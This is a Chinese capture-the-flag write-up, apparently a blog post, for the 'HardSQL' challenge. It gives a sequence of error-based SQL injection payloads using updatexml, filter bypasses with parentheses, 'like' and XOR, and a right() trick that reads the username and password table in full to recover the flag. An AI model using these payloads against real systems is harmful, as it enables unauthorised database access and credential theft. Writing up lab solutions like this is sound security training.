[极客大挑战 2019]HardSQL

首先万能密码 admin'#,报出密码错误。

admin' union select 1,2,3#查询报出密另一种错误,开来是检测到恶意字符了。

先考虑union绕过,

单独拿出来试,大小写注释双写等都无法报出 wrong password 这个错误信息,说明没有绕过检测成功。

select通过以上方法也是无法绕。

好多检测过滤不掉了,联合查询此题看来是无法用了。

尝试报错注入。

admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#或者用异或代替or

admin'^(updatexml(1,concat(0x7e,database(),0x7e),1))#

得到数据库

admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database)),0x7e),1))#
用括号进行绕过空格。

updatexml concat select,information往后逐个检测是否有过滤,检查到等于号时

 发现等于号原来也被过滤了,可用like进行代替。

admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

 admin'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#

 只得到左边的flag,看来是对数据库的数据显示有长度限制,只显示了左边的26个字符

网上的一个骚姿势是用right函数right(password,27)显示右边的26个字符

拼接得到flag。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值